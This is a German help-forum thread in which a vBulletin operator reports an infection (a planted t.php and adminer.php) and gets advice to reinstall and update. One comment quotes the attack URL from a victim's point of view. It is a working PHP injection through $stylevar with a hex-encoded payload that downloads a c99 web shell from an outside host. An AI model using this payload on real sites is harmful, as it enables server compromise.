Hat noch jemand ein t.php in seiner vBulletin Forensoftware?

...komplette Frage anzeigen

2 Antworten

Das austauschen einer einzelnen Datei, bzw. das updaten hilft hier wohl leider nichts. Der Virus wird sicherlich einige Dateien erzeugt haben die sich in der Dateistruktur von VBulletin eingenistet haben.

Da hilft vermutlich nur (wenn überhaupt) ein löschen aller Dateien, und eine Neuinstallation.

Denn auch über die Datenbank lässt sich sicherlich irgendwie ebenfalls wieder Schadcode einfügen.

Antwort bewerten Vielen Dank für Deine Bewertung
Kommentar von Evergreen89
17.12.2015, 13:03

Ja, ich habe gestern Abend eine neuinstallation durchgeführt. Leider hat das nicht viel gebracht, denn heute morgen um 5 Uhr war gleich der nächste Angriff. Zumindest konnte ich jetzt wohl die Lücke finden, wie die Datei auf den Server gelangen konnte:

http://domain.de/members/278.html?a=$stylevar[${${file_put_contents(\"v.php\",\"\\x3C\\x3F\\x70\\x68\\x70\\x0A\\x24\\x68\\x6F\\x6D\\x65\\x70\\x61\\x67\\x65\\x20\\x3D\\x20\\x66\\x69\\x6C\\x65\\x5F\\x67\\x65\\x74\\x5F\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x73\\x28\\x27\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x72\\x35\\x37\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x6E\\x65\\x74\\x2F\\x73\\x68\\x65\\x6C\\x6C\\x2F\\x63\\x39\\x39\\x2E\\x74\\x78\\x74\\x27\\x29\\x3B\\x0A\\x24\\x66\\x20\\x3D\\x20\\x66\\x6F\\x70\\x65\\x6E\\x28\\x27\\x74\\x2E\\x70\\x68\\x70\\x27\\x2C\\x27\\x77\\x27\\x29\\x3B\\x0A\\x66\\x77\\x72\\x69\\x74\\x65\\x28\\x24\\x66\\x2C\\x24\\x68\\x6F\\x6D\\x65\\x70\\x61\\x67\\x65\\x29\\x3B\\x0A\\x3F\\x3E\")}}]
0

wie? der virenscanner (welcher ?) springt bei einer reinen textdatei an? was stand denn da drin? was für ein virus wurde gemeldet?

Antwort bewerten Vielen Dank für Deine Bewertung
Kommentar von Evergreen89
16.12.2015, 20:48

Habe Avira AntiVirus Free. War keine Textdatei sondern wie geschrieben eine PHP-Datei. Was drinne stand wollte ich nach der Meldung nicht wissen.

Das vBulletin Diagnose-Tool hat mir doch recht viele unbekannte, nicht-vBulletin Dateien angezeigt. Darunter auch adminer.php (etwas wie phpmyadmin). Jetzt wird erstmal auf vB 4.2.3 geupdatet. In der Hoffnung das die Lücke zu ist.

0

Was möchtest Du wissen?